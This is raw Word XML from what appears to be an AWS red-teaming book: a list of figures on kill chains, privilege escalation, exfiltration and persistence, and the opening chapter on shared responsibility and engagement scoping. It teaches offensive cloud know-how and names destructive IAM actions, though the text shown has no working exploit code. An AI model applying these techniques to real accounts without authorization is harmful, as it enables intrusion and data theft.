        <w:t>49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD73EA"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5.1  CloudFox module map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54CFAB"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6.1  Credential-leak kill chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFB01C"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7.1  IAM policy evaluation order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403E59C"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7.2  Trust-relationship abuse diagram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C576F"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8.1  Privilege-escalation matrix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>125</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702F4EC"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9.1  Role-chain graph across three accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AD309"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9.2  Resource-policy trust surface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>149</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFEB6D2"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10.1  EC2/SSM/Lambda attack tree (RCE + creds)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB852C1"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11.1  EBS snapshot exfiltration flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4BA65B"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12.1  Data-service exfiltration pathways</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A39CECB"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13.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>EKS identity plumbing (IRSA, node role, cluster role)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>213</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF2480"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14.1  EventBridge persistence diagram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE82BC5"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15.1  Persistence primitives mapped to MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>246</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE42CA3"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16.1  Log-path coverage matrix by service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>262</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22913DA9"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17.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Exfil channels ranked by stealth vs. throughput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>278</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F74B12"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18.1  Tool coverage vs. MITRE ATT&amp;CK for Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>295</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207C0BE"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19.1  CI/CD trust graph reaching into production AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>313</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79EC45"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20.1  Sample attack narrative (end-to-end kill chain)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>328</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A1C90" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20.2  Finding template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD696B4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="294944437"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Part One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766061C9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:divId w:val="103354307"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Foundations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A945986" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:divId w:val="103354307"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Before you can meaningfully attack an AWS account, you need a working mental model of the shared-responsibility boundary as an adversary sees it, a map of the entry classes that break through that boundary, and a lab environment where you can detonate without burning down the house. Part I builds all three.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B4D1C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="103354307"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CONTROL PLAN</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DATA PLAN</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IDENTIT</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BLAST RADIU</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p>
    <w:p w14:paraId="760A066E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="1029835427"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Foundations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5B34D"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The AWS Threat Model and Shared Responsibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC8F3A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="565185248"/>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7C6F8074" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="565185248"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Map the AWS shared-responsibility model onto an adversary's mental model. Identify which layers the operator has authority to test, how the control plane and the data plane differ as attack surfaces, and how blast radius scales from service to account to organization. Close with the regulatory context that shapes every engagement scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FE0EB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared responsibility is the phrase cloud providers reach for when they want to remind customers that the security of the cloud is Amazon's problem and security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cloud is the customer's. It is a useful marketing shorthand and a catastrophically insufficient threat model. For an offensive security professional, the shared-responsibility boundary is not a legal disclaimer; it is an attack map. Every line on that map is either an in-scope primitive, an out-of-scope one, or a gray zone that will generate an awkward email from AWS Trust &amp; Safety if you cross it without notice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C847E18" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1.1  Shared responsibility revisited from an attacker's lens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6600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official AWS diagram splits responsibility into two stripes — AWS owns the physical datacenter, the hypervisor, the service control plane, and the service availability; the customer owns their data, their IAM, their applications, their network configuration, and their guest operating systems. That is true but it is a pedagogical simplification. A red-team operator working a cloud engagement cares about a finer-grained version with at least five layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF739D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Physical and hypervisor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Out of scope. Full stop. You will never be asked to test this layer. AWS Nitro hypervisor isolation, tenant sibling leakage, cold-boot attacks against physical instances — these are AWS's problem and have their own bug-bounty channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C034446" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Service control plane.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The AWS API endpoints themselves (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">). AWS is responsible for the security of the endpoints; the customer is responsible for what they do through them. In practice the service endpoints themselves are rarely the attack path — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>credentials authorized to call them</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F141C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Service configuration.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The customer's IAM policies, resource policies, SCPs, Security Groups, KMS key policies, S3 bucket ACLs, RDS snapshot sharing settings. This is where 90 percent of real compromises are consummated. Fully in scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93587A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Guest workload.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The EC2 instance, the Lambda function code, the container image, the RDS schema. In scope, but governed by the AWS Customer Support Policy for Penetration Testing — certain categories (DNS zone walking of Route53-hosted zones, DDoS simulation) require advance notice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B62626" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Customer data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> S3 objects, EBS volumes, RDS rows. In scope when reached through a legitimate attack chain, but the engagement letter should specify whether you may read, whether you may exfiltrate to an attacker bucket, and whether mock PII counts as "sensitive."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E253E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threat-model questions you ask at scoping time are framed by these layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B88A93" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Which accounts are in scope?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Production only, staging only, a dedicated red-team target OU?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A8E6D8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Which identities are in scope?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The engagement may restrict you to one federated test user, a set of simulated leaked keys, or a compromised-developer-workstation scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ACC436" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Are destructive primitives authorized?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:ScheduleKeyDeletion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:DeleteBucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:TerminateInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:DeleteUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> are categorically different from read-only enumeration. Most scopes exclude them; some explicitly require them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F019FE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
